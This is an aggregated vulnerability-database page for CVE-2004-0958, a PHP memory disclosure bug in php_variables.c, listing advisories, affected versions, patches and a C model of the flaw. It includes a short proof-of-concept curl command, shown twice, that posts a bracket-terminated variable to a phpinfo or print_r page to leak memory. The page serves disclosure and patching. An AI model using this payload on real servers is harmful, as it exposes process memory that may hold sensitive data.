CVE-2004-0958
CVSS 5.0
Published: 2004-11-03 00:00:00
Revised: 2016-10-17 22:50:10

[Original] php_variables.c in PHP before 5.0.2 allows remote attackers to read sensitive memory contents via (1) GET, (2) POST, or (3) COOKIE GPC variables that end in an open bracket character, which causes PHP to calculate an incorrect string length.


[CNNVD] PHP PHP_Variables Remote Memory Disclosure Vulnerability (CNNVD-200411-030)

        
PHP is a popular server-side web programming language.
Because php_variables.c parses array variables incorrectly, a remote attacker can exploit this vulnerability to obtain PHP code or portions of process memory.
By appending a '[' after a GET/POST/COOKIE array variable, for example abc[a][, the length of the array element 'a' is set to strlen("abc"), the length of the variable name; this makes the server return part of its memory to the attacker and may disclose sensitive information.
        

- CVSS (base score)

CVSS score: 5 [MEDIUM]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (affected platforms and products)

Product and version information (CPE) not yet available

- OVAL (technical details for detection)

oval:org.mitre.oval:def:10863 php_variables.c in PHP before 5.0.2 allows remote attackers to read sensitive memory contents via (1) GET, (2) POST, or (3) COOKIE GPC varia...
*OVAL describes in detail how this vulnerability is detected; see the related OVAL definition for more technical details on detecting it.

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0958
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0958
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200411-030
(official data source) CNNVD

- Other links and resources

http://archives.neohapsis.com/archives/vulnwatch/2004-q3/0053.html
(UNKNOWN)  VULNWATCH  20040915 [VulnWatch] PHP Vulnerability N. 1
http://marc.info/?l=bugtraq&m=109527531130492&w=2
(UNKNOWN)  BUGTRAQ  20040915 PHP Vulnerability N. 1
http://securitytracker.com/id?1011279
(UNKNOWN)  SECTRACK  1011279
http://www.redhat.com/support/errata/RHSA-2004-687.html
(VENDOR_ADVISORY)  REDHAT  RHSA-2004:687
http://xforce.iss.net/xforce/xfdb/17393
(VENDOR_ADVISORY)  XF  php-phpinfo-disclose-memory(17393)
https://bugzilla.fedora.us/show_bug.cgi?id=2344
(UNKNOWN)  FEDORA  FLSA:2344

- Vulnerability information

PHP PHP_Variables Remote Memory Disclosure Vulnerability
Medium Other
2004-11-03 00:00:00 2005-10-20 00:00:00
Remote

- Advisories and patches

Temporary workaround:
If you cannot install the patch or upgrade immediately, CNNVD recommends the following measure to reduce the threat:
* In PHP 5.0.1, change line 136 of main/php_variables.c from
index_len = var_len = strlen(var);
to
index_len = var_len = strlen(index);
and recompile.
Vendor patch:
PHP
---
The vendor has released an upgrade that fixes this security issue; download it from the vendor's homepage:
PHP Upgrade PHP 5.0.2

http://www.php.net/downloads.php#v5
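The workaround above changes only which string's length is taken. As an added illustration written for this page (not PHP's source and not from the advisory), the following simplified C model of the bracket walk in php_register_variable_ex() shows the effect for a name such as abc[a][: with the 5.0.1 expression strlen(var) the registered segment "a" is sized at the base name's length, 3, while strlen(index) gives its true length, 1. The function name register_len, the struct seglen and the 256-byte buffer are assumptions of the model.

```c
#include <stdio.h>
#include <string.h>

/* used_len: bytes PHP would copy for the name; real_len: the segment's true length. */
struct seglen { size_t used_len; size_t real_len; };

/* Simplified model of the '['/']' walk in php_register_variable_ex()
 * (main/php_variables.c); not PHP's code.  fixed=0 models 5.0.1, whose
 * unclosed-bracket path used strlen(var); fixed=1 models 5.0.2's strlen(index). */
static struct seglen register_len(const char *name, int fixed)
{
    struct seglen r = { 0, 0 };
    char var[256], *ip, *index;
    size_t index_len;
    if (strlen(name) >= sizeof var) return r;   /* model bound, not PHP's */
    strcpy(var, name);
    if (!(ip = strchr(var, '['))) {             /* no bracket: plain variable */
        r.used_len = r.real_len = strlen(var);
        return r;
    }
    *ip = '\0';                                 /* var now holds the base name */
    index = var; index_len = strlen(var);
    for (;;) {
        char *index_s = ++ip;                   /* this dimension's index text */
        if (*ip == ']') {
            index_s = NULL;                     /* "[]": auto-index, no text */
        } else if ((ip = strchr(ip, ']')) != NULL) {
            *ip = '\0';
        } else {
            /* Unclosed '[': PHP rewrites it to '_' and registers the current
             * segment as a plain variable.  5.0.1 took the length from var (the
             * base name); the fix takes it from index, the segment it copies. */
            *(index_s - 1) = '_';
            r.used_len = fixed ? strlen(index) : strlen(var);
            r.real_len = strlen(index);
            return r;
        }
        if (index_s) { index = index_s; index_len = strlen(index_s); }
        if (*++ip != '[') break;                /* name ends after a closed ']' */
    }
    r.used_len = r.real_len = index_len;        /* well-formed name: lengths agree */
    return r;
}

int main(void)
{
    struct seglen bad = register_len("abc[a][", 0), good = register_len("abc[a][", 1);
    printf("abc[a][: 5.0.1 uses %zu bytes, 5.0.2 uses %zu, segment is %zu\n", bad.used_len, good.used_len, bad.real_len);
    return 0;
}
```

The difference used_len - real_len is the number of bytes beyond the segment that the 5.0.1 code would copy into the registered variable name, which is what the PoC below turns into a memory dump by making the base name long.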

- Vulnerability information (24656)

PHP 4.x/5.0.1 PHP_Variables Remote Memory Disclosure Vulnerability (EDBID:24656)
php remote
2004-09-15 Verified
0 Stefano Di Paola
N/A
source: http://www.securityfocus.com/bid/11334/info

A vulnerability is reported to present itself in the array parsing functions of the 'php_variables.c' PHP source file. 

The vulnerability occurs when a PHP script is used to print URI parameters or other data supplied by a third party into a dynamically generated web page. It is reported that the vulnerable function does not strip certain characters from the user-supplied data; this may ultimately be harnessed to manipulate the parsing function into returning regions of process memory to the attacker.

It is reported that this issue only affects PHP versions 4.2.0 and subsequent.

$ curl "http://www.example.com/phpinfo.php" -d `perl -e 'print "f"x100;print "[g][=1"'`

where phpinfo.php is:
<?
phpinfo();
?>

or some php file containing print_r function:
<?
print_r($_REQUEST);
?>

- Vulnerability information

12601
PHP php_variables.c Multiple Variable Open Bracket Memory Disclosure
Information Disclosure
Loss of Confidentiality Upgrade
Vendor Verified

- Vulnerability description

- Timeline

2004-09-15 Unknown
Unknown Unknown

- Solution

Upgrade to version 5.0.2 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- Related references

- Vulnerability author

Unknown or Incomplete

- Vulnerability information

PHP PHP_Variables Remote Memory Disclosure Vulnerability
Failure to Handle Exceptional Conditions 11334
Yes No
2004-09-15 12:00:00 2009-07-12 07:06:00
Discovery of this issue is credited to Stefano Di Paola <stefano.dipaola@wisec.it>.

- Affected versions

SGI ProPack 3.0
RedHat Linux 9.0 i386
RedHat Linux 7.3 i386
Red Hat Fedora Core1
PHP PHP 5.0.1
PHP PHP 5.0.0
PHP PHP 4.3.8
+ Mandriva Linux Mandrake 10.1 x86_64
+ Mandriva Linux Mandrake 10.1
+ S.u.S.E. Linux Personal 9.2
+ Turbolinux Turbolinux Server 10.0
+ Ubuntu Ubuntu Linux 4.1 ppc
+ Ubuntu Ubuntu Linux 4.1 ia64
+ Ubuntu Ubuntu Linux 4.1 ia32
PHP PHP 4.3.7
PHP PHP 4.3.6
PHP PHP 4.3.5
PHP PHP 4.3.4
+ MandrakeSoft Corporate Server 3.0 x86_64
+ MandrakeSoft Corporate Server 3.0
+ Mandriva Linux Mandrake 10.0 AMD64
+ Mandriva Linux Mandrake 10.0
+ S.u.S.E. Linux Personal 9.1
PHP PHP 4.3.3
+ S.u.S.E. Linux Personal 9.0 x86_64
+ S.u.S.E. Linux Personal 9.0
+ Turbolinux Home
+ Turbolinux Turbolinux 10 F...
+ Turbolinux Turbolinux Desktop 10.0
PHP PHP 4.3.2
PHP PHP 4.3.1
+ Mandriva Linux Mandrake 9.1 ppc
+ Mandriva Linux Mandrake 9.1
+ OpenPKG OpenPKG Current
+ S.u.S.E. Linux Personal 8.2
PHP PHP 4.3
PHP PHP 4.2.3
+ EnGarde Secure Linux 1.0.1
+ MandrakeSoft Corporate Server 2.1 x86_64
+ MandrakeSoft Corporate Server 2.1
+ Mandriva Linux Mandrake 9.0
+ Turbolinux Turbolinux Server 8.0
+ Turbolinux Turbolinux Server 7.0
+ Turbolinux Turbolinux Workstation 8.0
+ Turbolinux Turbolinux Workstation 7.0
PHP PHP 4.2.2
+ Gentoo Linux 1.4 _rc1
+ Gentoo Linux 1.2
+ OpenPKG OpenPKG 1.1
+ RedHat Linux 8.0 i386
+ RedHat Linux 8.0
+ S.u.S.E. Linux 8.1
PHP PHP 4.2.1
- FreeBSD FreeBSD 4.6
- FreeBSD FreeBSD 4.5
- FreeBSD FreeBSD 4.4
- FreeBSD FreeBSD 4.3
+ Slackware Linux 8.1
PHP PHP 4.2.0
PHP PHP 4.1.2
+ Apple Mac OS X 10.1.5
+ Apple Mac OS X 10.1.4
+ Apple Mac OS X 10.1.3
+ Apple Mac OS X 10.1.2
+ Apple Mac OS X 10.1.1
+ Apple Mac OS X 10.1
+ Apple Mac OS X 10.1
+ Apple Mac OS X 10.0.4
+ Apple Mac OS X 10.0.3
+ Apple Mac OS X 10.0.2
+ Apple Mac OS X 10.0.1
+ Apple Mac OS X 10.0
+ Debian Linux 3.0 sparc
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 alpha
+ MandrakeSoft Multi Network Firewall 2.0
+ MandrakeSoft Single Network Firewall 7.2
+ Mandriva Linux Mandrake 8.2 ppc
+ Mandriva Linux Mandrake 8.2
PHP PHP 4.1.1
+ Conectiva Linux 7.0
PHP PHP 4.1.0
+ S.u.S.E. Linux 8.0 i386
+ S.u.S.E. Linux 8.0
PHP PHP 4.0.7
PHP PHP 4.0.6
+ Caldera OpenLinux Server 3.1.1
+ Caldera OpenLinux Server 3.1
+ Caldera OpenLinux Workstation 3.1.1
+ Caldera OpenLinux Workstation 3.1
+ HP Secure OS software for Linux 1.0
- IBM AIX 4.3.3
- IBM AIX 4.3.2
- IBM AIX 4.3.1
- IBM AIX 4.3
- IBM AIX 5.1
+ MandrakeSoft Corporate Server 1.0.1
+ Mandriva Linux Mandrake 8.1 ia64
+ Mandriva Linux Mandrake 8.1
+ Mandriva Linux Mandrake 8.0 ppc
+ Mandriva Linux Mandrake 8.0
+ Mandriva Linux Mandrake 7.2
+ Mandriva Linux Mandrake 7.1
+ RedHat Linux 7.2 ia64
+ RedHat Linux 7.2 i386
+ RedHat Linux 7.2
+ RedHat Linux 7.1 ia64
+ RedHat Linux 7.1 i386
+ RedHat Linux 7.1 alpha
+ RedHat Linux 7.1
+ RedHat Linux 7.0 i386
+ RedHat Linux 7.0 alpha
+ RedHat Linux 7.0
+ S.u.S.E. Linux 7.3 sparc
+ S.u.S.E. Linux 7.3 ppc
+ S.u.S.E. Linux 7.3 i386
+ S.u.S.E. Linux 7.3
+ S.u.S.E. Linux 7.2 i386
+ S.u.S.E. Linux 7.2
+ Sun Cobalt RaQ 550
+ Sun LX50
+ Trustix Secure Linux 1.5
PHP PHP 4.0.5
PHP PHP 4.0.4
+ Compaq Compaq Secure Web Server PHP 1.0
+ Conectiva Linux 6.0
+ Guardian Digital Engarde Secure Linux 1.0.1
+ S.u.S.E. Linux 7.2
+ S.u.S.E. Linux 7.1 x86
+ S.u.S.E. Linux 7.1 sparc
+ S.u.S.E. Linux 7.1 ppc
+ S.u.S.E. Linux 7.1 alpha
+ S.u.S.E. Linux 7.1
+ S.u.S.E. Linux 7.0 sparc
+ S.u.S.E. Linux 7.0 ppc
+ S.u.S.E. Linux 7.0 i386
+ S.u.S.E. Linux 7.0 alpha
+ S.u.S.E. Linux 7.0
PHP PHP 4.0.3
+ Debian Linux 2.2 sparc
+ Debian Linux 2.2 powerpc
+ Debian Linux 2.2 IA-32
+ Debian Linux 2.2 arm
+ Debian Linux 2.2 alpha
+ Debian Linux 2.2 68k
+ Debian Linux 2.2
+ Sun Cobalt Control Station 4100CS
+ Sun Cobalt Qube3 Japanese 4000WGJ
+ Sun Cobalt Qube3 Japanese w/ Caching and RAID 4100WGJ
+ Sun Cobalt Qube3 Japanese w/Caching 4010WGJ
+ Sun Cobalt RaQ XTR 3500R
+ Sun Cobalt RaQ XTR Japanese 3500R-ja
PHP PHP 4.0.2
PHP PHP 4.0.1
+ Sun Cobalt Qube3 4000WG
+ Sun Cobalt Qube3 w/ Caching and RAID 4100WG
+ Sun Cobalt Qube3 w/Caching 4010WG
+ Sun Cobalt RaQ4 3001R
+ Sun Cobalt RaQ4 Japanese RAID 3100R-ja
+ Sun Cobalt RaQ4 RAID 3100R
PHP PHP 4.0.0
Gentoo Linux 1.4 _rc3
Gentoo Linux 1.4 _rc2
Gentoo Linux 1.4 _rc1
Gentoo Linux 1.4
Gentoo Linux 1.2
Gentoo Linux 1.1 a
Gentoo Linux 0.7
Gentoo Linux 0.5
PHP PHP 5.0.2

- Unaffected versions

PHP PHP 5.0.2

- Vulnerability discussion

A vulnerability is reported to present itself in the array parsing functions of the 'php_variables.c' PHP source file.

The vulnerability occurs when a PHP script is used to print URI parameters or other data supplied by a third party into a dynamically generated web page. It is reported that the vulnerable function does not strip certain characters from the user-supplied data; this may ultimately be harnessed to manipulate the parsing function into returning regions of process memory to the attacker.

It is reported that this issue only affects PHP versions 4.2.0 and subsequent.

- Exploit

The following example is available:

$ curl "http://www.example.com/phpinfo.php" -d `perl -e 'print "f"x100;print "[g][=1"'`

where phpinfo.php is:
<?
phpinfo();
?>

or some php file containing print_r function:
<?
print_r($_REQUEST);
?>

- Solution

The vendor has released an upgrade dealing with this issue.

Gentoo Linux has released an advisory (GLSA 200410-04) and an updated eBuild to address this vulnerability. Gentoo users are advised to run the following commands to apply the updates:
emerge sync

emerge -pv ">=dev-php/php-4.3.9"
emerge ">=dev-php/php-4.3.9"

emerge -pv ">=dev-php/mod_php-4.3.9"
emerge ">=dev-php/mod_php-4.3.9"

emerge -pv ">=dev-php/php-cgi-4.3.9"
emerge ">=dev-php/php-cgi-4.3.9"

Red Hat has released Red Hat Enterprise Linux advisory RHSA-2004:687-05 to address various issues in PHP. Please see the advisory in Web references for more information.

Fedora has released advisories FEDORA-2004-567 and FEDORA-2004-568 to address various PHP issues in Fedora Core 2 and Fedora Core 3. Please see the referenced advisories for more information.

SGI has released advisory 20050101-01-U to address various issues in SGI Advanced Linux Environment 3. This advisory includes updated SGI ProPack 3 Service Pack 3 packages. Please see the referenced advisory for more information.

Fedora has released Fedora Legacy advisory FLSA:2344 to address various issues in Red Hat Linux 7.3, Red Hat Linux 9.0 and Fedora Core 1 for the i386 architecture. Please see the referenced advisory for more information.

- Related references